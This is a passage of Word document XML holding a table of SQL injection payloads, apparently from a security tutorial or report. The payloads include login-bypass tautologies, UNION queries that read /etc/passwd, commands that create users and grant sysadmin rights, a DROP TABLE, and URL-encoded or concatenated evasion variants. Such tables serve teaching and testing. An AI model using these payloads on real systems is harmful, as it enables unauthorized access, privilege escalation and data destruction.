                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘or 1 in (select @@version)--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18B9A730" w14:textId="37FB013F" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">‘;EXEC(‘SEL’+’ECT US’ + ‘ER’) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962467" w:rsidRPr="00D84A48" w14:paraId="26C71777" w14:textId="77777777" w:rsidTr="00962467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="367A9A4E" w14:textId="3EDBF10B" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(||6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187E78BB" w14:textId="16BB1169" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Admin’ OR’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46EA61F8" w14:textId="21979787" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘;EXECUTE IMMEDIATE ‘SEL’ || ‘ECT US’ || ‘ER’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28BD3E3D" w14:textId="4F9CDA3A" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘ union all select @@version--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F096726" w14:textId="4F6CC826" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+or+isnull%281%2F0%29+%2F*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962467" w:rsidRPr="00D84A48" w14:paraId="5A3E019E" w14:textId="77777777" w:rsidTr="00962467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3624622B" w14:textId="17D0DF98" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‘OR 1=1--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD6E5FC" w14:textId="431E91DA" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘ having 1=1--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B41D0A2" w14:textId="06CE248D" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CREATE USER name IDENTIFIED BY ‘pass123’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36EDB9C2" w14:textId="2D5CEC39" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘OR ‘unusual’ = ‘unusual’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58FC1853" w14:textId="60DF069F" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>%27+OR+%277659%27%3D%277659</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962467" w:rsidRPr="00D84A48" w14:paraId="4678C6DF" w14:textId="77777777" w:rsidTr="00962467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC2206D" w14:textId="227232DA" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OR 1=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54629F42" w14:textId="1215A6DF" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘OR ‘text’ = N’text’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66848084" w14:textId="63AF6C09" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘union select 1,load_file(‘/etc/passwd’),1,1,1;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0443241E" w14:textId="5BD089DB" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘ OR ‘something’ = ‘some’+’thing’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ECD5669" w14:textId="6A4588AC" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>%22+or+isnull%281%2f0%29+%2F*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962467" w:rsidRPr="007D796A" w14:paraId="7F2D2EE2" w14:textId="77777777" w:rsidTr="00962467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B2F1440" w14:textId="036C9F19" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>%27+--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0828BADD" w14:textId="79203375" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘union select</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D955B12" w14:textId="6363043E" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GRANT CONNECT TO name; GRANT RESOURCE TO name;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05D39084" w14:textId="68A6985C" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘OR 2 BETWEEN 1 and 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="205BDCAA" w14:textId="5A2FF975" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>exec sp_addlogin ‘name’, ‘password’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B80A77" w:rsidRPr="00D84A48" w14:paraId="48968AC5" w14:textId="77777777" w:rsidTr="00962467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3AACFE" w14:textId="7BB9257F" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>; OR ‘1’=’1’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="650B437E" w14:textId="08E07FA3" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>‘OR ‘text’ &gt; ‘t’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2933F4" w14:textId="278D457E" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>exec sp_addsrvrolemember ‘name’, ‘sysadmin’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53BB0928" w14:textId="394907EF" w:rsidR="00B80A77" w:rsidRPr="00B80A77" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B80A77">
              <w:rPr>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>‘OR ‘</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="495B2490" w14:textId="7B614D38" w:rsidR="00B80A77" w:rsidRPr="00B80A77" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>‘; drop table temp --</w:t>
            </w:r>
          </w:p>
        </w:tc>
